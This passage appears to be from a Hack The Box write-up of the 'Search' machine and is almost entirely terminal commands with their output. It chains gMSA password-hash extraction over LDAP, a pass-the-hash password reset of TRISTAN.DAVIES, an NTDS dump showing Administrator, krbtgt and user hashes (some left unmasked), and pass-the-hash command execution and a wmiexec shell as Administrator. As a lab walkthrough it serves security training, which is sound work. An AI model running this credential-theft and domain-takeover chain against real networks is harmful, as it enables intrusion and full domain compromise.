┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ nxc ldap $ip -u 'sierra.frye' -p '$$49=wide=STRAIGHT=jordan=28$$18' --gmsa

<snip>
LDAPS  10.10.11.129   636  RESEARCH   Account: BIR-ADFS-GMSA$   NTLM: e1e9fd9e46d0d747e1595167eedcec0f

Change the password of the TRISTAN.DAVIES account using the pass-the-hash build of the net rpc tool

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ pth-net rpc password "TRISTAN.DAVIES" 'P@ssword123!' -U "search.htb"/"BIR-ADFS-GMSA$"%"ffffffffffffffffffffffffffffffff":"e1e9fd9e46d0d747e1595167eedcec0f" -S "$ip"
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ crackmapexec smb $ip -u TRISTAN.DAVIES -p 'P@ssword123!' 

SMB   10.10.11.129   445  RESEARCH  [+] search.htb\TRISTAN.DAVIES:P@ssword123! (Pwn3d!)
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ crackmapexec smb $ip -u TRISTAN.DAVIES -p 'P@ssword123!' --ntds

SMB         10.10.11.129    445    RESEARCH         [+] search.htb\TRISTAN.DAVIES:P@ssword123! (Pwn3d!)
SMB         10.10.11.129    445    RESEARCH         [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         10.10.11.129    445    RESEARCH         Administrator:500:aad3b435b51404eeaad3b435b51404ee:5e3c0abbe0b4163c56xxxxxxxxxxxx:::
SMB         10.10.11.129    445    RESEARCH         Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.10.11.129    445    RESEARCH         krbtgt:502:aad3b435b51404eeaad3b435b51404ee:cd69d23e4383daa5b0f42d29dba9529a:::
SMB         10.10.11.129    445    RESEARCH         search.htb\Santino.Benjamin:1194:aad3b435b51404eeaad3b435b51404ee:5e3c0abbe0b4163c5612afe25c69ced6:::
<snip>

Get the flag with NetExec

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ nxc smb $ip -u administrator -H 5e3c0abbe0b4163c56xxxxxxxxxxxx -x 'type C:\Users\Administrator\Desktop\root.txt'

SMB         10.10.11.129    445    RESEARCH         [+] search.htb\administrator:5e3c0abbe0b4xxxxxxxxxx163c56x (Pwn3d!)
SMB         10.10.11.129    445    RESEARCH         [+] Executed command via wmiexec
SMB         10.10.11.129    445    RESEARCH         b2f761828983df3ff185cdc96604225d

Or access the machine with wmiexec.py

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ impacket-wmiexec search.htb/administrator@$ip -hashes :5e3c0abbe0b4163c56xxxxxxxxxxx
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
search\administrator

Root Flag: b2f761828983df3ffxxxxxxxxxxxxx

References

GitHub - micahvandeusen/gMSADumper: Lists who can read any gMSA password blobs and parses them if the current user has access.
Extract gMSA Secrets | NetExec